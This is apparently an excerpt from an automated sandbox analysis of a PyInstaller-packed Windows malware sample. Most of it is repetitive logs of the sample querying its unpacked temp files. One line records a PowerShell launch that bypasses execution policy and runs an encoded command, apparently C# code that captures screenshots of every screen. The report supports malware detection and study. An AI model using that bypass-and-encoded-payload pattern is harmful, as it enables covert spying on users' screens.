            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B89570 cpuid 0_2_00007FF7B2B89570
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\attrs-24.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\attrs-24.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\license_files VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\license_files VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\_ctypes.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\attrs-24.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\_socket.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\select.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\_bz2.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\_lzma.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
